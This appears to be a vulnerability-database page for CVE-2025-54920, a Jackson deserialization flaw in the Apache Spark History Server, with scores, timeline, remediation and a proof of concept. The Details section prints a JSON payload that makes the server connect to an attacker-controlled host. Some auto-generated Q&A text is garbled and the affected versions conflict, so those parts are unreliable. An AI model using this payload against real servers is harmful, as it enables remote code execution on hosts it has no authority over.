What is the CVSS score of CVE-2025-54920?

CVE-2025-54920 has a CVSS 3.1 base score of 8.8 (High). CVSS vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H. EPSS exploitation probability: 0.2%.

Which versions of Apache are affected by CVE-2025-54920?

Organizations using This face significant risk from CVE-2025-54920, a insecure deserialization vulnerability rated CVSS 8.8.. A patch is available.

How to fix or mitigate CVE-2025-54920?

Within 7 days: Identify all affected systems and apply vendor patches promptly. Restrict deserialization to trusted data sources and implement integrity checks.

Apache CVE-2025-54920

EUVD-2025-208669 HIGH

Deserialization of Untrusted Data (CWE-502)

2026-03-14 apache

GHSA-jwp6-cvj8-fw65

Command Injection RCE Deserialization Apache Red Hat

8.8

CVSS 3.1 · NVD

Severity by source

NVD PRIMARY

8.8 HIGH

AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Red Hat

6.7 MEDIUM

qualitative

Primary rating from NVD.

CVSS VectorNVD

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Attack Vector

Network

Attack Complexity

Low

Privileges Required

Low

User Interaction

None

Scope

Unchanged

Confidentiality

High

Integrity

High

Availability

High

Lifecycle Timeline

EUVD ID Assigned

Mar 14, 2026 - 10:00 euvd

EUVD-2025-208669

Analysis Generated

Mar 14, 2026 - 10:00 vuln.today

Patch released

Mar 14, 2026 - 10:00 nvd

Patch available

CVE Published

Mar 14, 2026 - 09:01 nvd

HIGH 8.8

Blast Radius

ecosystem impact

† from your stack dependencies † transitive graph · vuln.today resolves 4-path depth

48 maven packages depend on org.apache.spark:spark-core_2.10 (38 direct, 10 indirect)
238 maven packages depend on org.apache.spark:spark-core_2.11 (110 direct, 141 indirect)
59 maven packages depend on org.apache.spark:spark-core_2.12 (26 direct, 33 indirect)
85 maven packages depend on org.apache.spark:spark-core_2.13 (34 direct, 51 indirect)
11 maven packages depend on org.apache.spark:spark-core_2.9.3 (11 direct, 0 indirect)

Ecosystem-wide dependent count for version 2.2.3 and other introduced versions.

DescriptionCVE.org

This issue affects Apache Spark: before 3.5.7 and 4.0.1. Users are recommended to upgrade to version 3.5.7 or 4.0.1 and above, which fixes the issue.

Summary

Apache Spark 3.5.4 and earlier versions contain a code execution vulnerability in the Spark History Web UI due to overly permissive Jackson deserialization of event log data. This allows an attacker with access to the Spark event logs directory to inject malicious JSON payloads that trigger deserialization of arbitrary classes, enabling command execution on the host running the Spark History Server.

Details

The vulnerability arises because the Spark History Server uses Jackson polymorphic deserialization with @JsonTypeInfo.Id.CLASS on SparkListenerEvent objects, allowing an attacker to specify arbitrary class names in the event JSON. This behavior permits instantiating unintended classes, such as org.apache.hive.jdbc.HiveConnection, which can perform network calls or other malicious actions during deserialization.

The attacker can exploit this by injecting crafted JSON content into the Spark event log files, which the History Server then deserializes on startup or when loading event logs. For example, the attacker can force the History Server to open a JDBC connection to a remote attacker-controlled server, demonstrating remote command injection capability.

Proof of Concept:

Run Spark with event logging enabled, writing to a writable directory (spark-logs).
Inject the following JSON at the beginning of an event log file:

{

"Event": "org.apache.hive.jdbc.HiveConnection", "uri": "jdbc:hive2://<IP>:<PORT>/", "info": { "hive.metastore.uris": "thrift://<IP>:<PORT>" } }

Start the Spark History Server with logs pointing to the modified directory.
The Spark History Server initiates a JDBC connection to the attacker’s server, confirming the injection.

Impact

An attacker with write access to Spark event logs can execute arbitrary code on the server running the History Server, potentially compromising the entire system.

AnalysisAI

This issue affects Apache Spark: before 3.5.7 and 4.0.1.

Technical ContextAI

Insecure deserialization occurs when untrusted data is used to reconstruct objects, allowing attackers to manipulate serialized data to execute arbitrary code. This vulnerability is classified as Deserialization of Untrusted Data (CWE-502).

RemediationAI

A vendor patch is available — apply it immediately. Avoid deserializing untrusted data. Use safe serialization formats (JSON instead of native serialization). Implement integrity checks on serialized data.

Vendor StatusVendor

CVE-2025-54920 vulnerability details – vuln.today

Back

Apache CVE-2025-54920

Severity by source

CVSS VectorNVD

Lifecycle Timeline

Blast Radius

DescriptionCVE.org

AnalysisAI

Technical ContextAI

RemediationAI

Vendor StatusVendor

Share

External POC / Exploit Code